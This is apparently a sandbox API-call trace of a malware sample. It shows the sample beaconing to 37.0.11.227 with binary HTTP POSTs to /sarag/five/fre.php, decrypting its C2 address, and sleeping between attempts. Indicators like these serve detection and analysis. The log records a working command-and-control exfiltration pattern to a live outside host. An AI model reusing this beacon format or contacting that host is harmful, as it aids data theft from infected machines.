0x6a31f0 [0214.068] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0214.068] GetProcessHeap () returned 0x690000 [0214.068] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0214.068] socket (af=2, type=1, protocol=6) returned 0x50c [0214.069] connect (s=0x50c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0214.096] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0214.096] GetProcessHeap () returned 0x690000 [0214.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0214.096] GetProcessHeap () returned 0x690000 [0214.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0214.096] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0214.098] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0214.098] GetProcessHeap () returned 0x690000 [0214.098] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0214.098] GetProcessHeap () returned 0x690000 [0214.098] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0214.100] GetProcessHeap () returned 0x690000 [0214.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0214.100] GetProcessHeap () returned 0x690000 [0214.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0214.101] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0214.102] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0214.102] GetProcessHeap () returned 0x690000 [0214.102] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0214.102] GetProcessHeap () returned 0x690000 [0214.102] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0214.102] send (s=0x50c, buf=0x6ab500*, len=242, flags=0) returned 242 [0214.103] send (s=0x50c, buf=0x6aba40*, len=159, flags=0) returned 159 [0214.103] GetProcessHeap () returned 0x690000 [0214.103] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0214.103] recv (in: s=0x50c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0214.184] GetProcessHeap () returned 0x690000 [0214.185] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0214.185] GetProcessHeap () returned 0x690000 [0214.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0214.186] GetProcessHeap () returned 0x690000 [0214.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0214.186] GetProcessHeap () returned 0x690000 [0214.187] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0214.187] closesocket (s=0x50c) returned 0 [0214.187] GetProcessHeap () returned 0x690000 [0214.187] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0214.187] GetProcessHeap () returned 0x690000 [0214.187] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0214.188] GetProcessHeap () returned 0x690000 [0214.188] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0214.188] GetProcessHeap () returned 0x690000 [0214.188] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0214.189] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xacc) returned 0x50c [0214.190] Sleep (dwMilliseconds=0xea60) [0214.193] GetProcessHeap () returned 0x690000 [0214.193] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0214.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.194] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.200] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0214.206] GetProcessHeap () returned 0x690000 [0214.206] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0214.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.207] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0214.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.209] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.210] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.210] GetProcessHeap () returned 0x690000 [0214.211] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0214.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.212] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0214.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.213] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0214.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.214] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0214.214] GetProcessHeap () returned 0x690000 [0214.214] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0214.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.215] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0214.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.216] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0214.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.217] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0214.218] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.218] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0214.218] GetProcessHeap () returned 0x690000 [0214.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0214.219] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0214.219] GetProcessHeap () returned 0x690000 [0214.219] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0214.223] GetProcessHeap () returned 0x690000 [0214.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0214.224] GetProcessHeap () returned 0x690000 [0214.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0214.224] GetProcessHeap () returned 0x690000 [0214.224] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0214.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.228] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.235] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0214.242] GetProcessHeap () returned 0x690000 [0214.242] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0214.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.243] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0214.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.243] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.244] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.244] GetProcessHeap () returned 0x690000 [0214.245] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0214.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.246] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0214.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.248] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0214.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.249] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0214.249] GetProcessHeap () returned 0x690000 [0214.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0214.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.250] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0214.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.251] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0214.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.252] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0214.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.253] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0214.253] GetProcessHeap () returned 0x690000 [0214.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0214.253] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0214.253] GetProcessHeap () returned 0x690000 [0214.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0214.253] socket (af=2, type=1, protocol=6) returned 0x510 [0214.253] connect (s=0x510, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0214.282] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0214.282] GetProcessHeap () returned 0x690000 [0214.282] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0214.282] GetProcessHeap () returned 0x690000 [0214.282] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0214.282] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0214.283] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0214.283] GetProcessHeap () returned 0x690000 [0214.283] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0214.283] GetProcessHeap () returned 0x690000 [0214.284] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0214.284] GetProcessHeap () returned 0x690000 [0214.284] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0214.284] GetProcessHeap () returned 0x690000 [0214.284] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0214.285] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0214.285] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0214.286] GetProcessHeap () returned 0x690000 [0214.286] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0214.286] GetProcessHeap () returned 0x690000 [0214.286] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0214.286] send (s=0x510, buf=0x6ad508*, len=242, flags=0) returned 242 [0214.287] send (s=0x510, buf=0x6aba40*, len=159, flags=0) returned 159 [0214.287] GetProcessHeap () returned 0x690000 [0214.287] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0214.287] recv (in: s=0x510, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0214.385] GetProcessHeap () returned 0x690000 [0214.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0214.386] GetProcessHeap () returned 0x690000 [0214.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0214.386] GetProcessHeap () returned 0x690000 [0214.387] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0214.387] GetProcessHeap () returned 0x690000 [0214.387] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0214.387] closesocket (s=0x510) returned 0 [0214.388] GetProcessHeap () returned 0x690000 [0214.388] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0214.388] GetProcessHeap () returned 0x690000 [0214.388] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0214.388] GetProcessHeap () returned 0x690000 [0214.388] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0214.389] GetProcessHeap () returned 0x690000 [0214.389] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0214.390] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xcd0) returned 0x510 [0214.391] Sleep (dwMilliseconds=0xea60) [0214.393] GetProcessHeap () returned 0x690000 [0214.393] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0214.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.394] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.407] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0214.421] GetProcessHeap () returned 0x690000 [0214.421] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0214.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.423] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0214.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.424] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.425] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.425] GetProcessHeap () returned 0x690000 [0214.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0214.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.427] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0214.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.428] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0214.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.429] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0214.429] GetProcessHeap () returned 0x690000 [0214.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0214.430] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.430] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0214.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.464] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0214.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.467] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0214.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.468] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0214.468] GetProcessHeap () returned 0x690000 [0214.468] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0214.468] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0214.468] GetProcessHeap () returned 0x690000 [0214.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0214.469] GetProcessHeap () returned 0x690000 [0214.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0214.469] GetProcessHeap () returned 0x690000 [0214.470] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0214.470] GetProcessHeap () returned 0x690000 [0214.470] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0214.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.473] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.483] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0214.493] GetProcessHeap () returned 0x690000 [0214.493] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0214.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.494] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0214.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.496] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.497] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.497] GetProcessHeap () returned 0x690000 [0214.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0214.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.499] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0214.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.500] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0214.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.501] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0214.501] GetProcessHeap () returned 0x690000 [0214.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0214.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.502] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0214.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.503] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0214.504] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.505] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0214.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.506] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0214.506] GetProcessHeap () returned 0x690000 [0214.506] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0214.506] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0214.506] GetProcessHeap () returned 0x690000 [0214.506] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0214.506] socket (af=2, type=1, protocol=6) returned 0x514 [0214.507] connect (s=0x514, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0214.535] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0214.535] GetProcessHeap () returned 0x690000 [0214.535] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0214.535] GetProcessHeap () returned 0x690000 [0214.535] RtlAllocateHeap (HeapHandle=0x690000, 